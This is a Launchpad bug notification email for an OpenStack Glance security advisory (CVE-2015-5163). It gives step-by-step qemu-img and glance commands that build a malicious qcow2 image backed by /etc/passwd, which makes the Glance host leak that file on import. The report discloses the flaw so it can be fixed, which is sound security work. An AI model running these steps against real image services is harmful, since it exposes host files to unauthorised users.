** Changed in: ossa
Status: Fix Committed => Fix Released
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1471912
Title:
[OSSA 2015-014] Format-guessing and file disclosure via image
conversion (CVE-2015-5163)
Status in Glance:
Fix Committed
Status in OpenStack Security Advisory:
Fix Released
Bug description:
This is a security flaw that allows files from the Glance host to be
obtained by a user.
I'm using the Glance file store and have set in /etc/glance/glance-api.conf:
[taskflow_executor]
engine_mode=serial # not sure if needed
conversion_format=raw
Make a malicious image available via HTTP.
$ sudo qemu-img create -f qcow2 /var/www/html/test_image 1M
$ sudo qemu-img rebase -u -b /etc/passwd /var/www/html/test_image
$ glance --os-image-api-version 2 task-create --type import --input
'{"import_from_format": "qcow2", "import_from": "http://127.0.0.1/test_image";,
"image_properties": {"name": "my_image_test", "disk_format": "qcow2",
"container_format": "bare"}}'
$ glance image-download my_image_test --file downloaded_image
$ head downloaded_image
<contents from /etc/passwd on the Glance host>
This happens because Glance runs this command which doesn't specify a format,
and uses qemu-img's format auto-detection:
qemu-img convert -O raw file:///tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4
/tmp/28e1f5e8-9f62-4c01-84be-9feae8852ea4.converted
Similar to Cinder bug 1415087.
To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1471912/+subscriptions
--
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help : https://help.launchpad.net/ListHelp
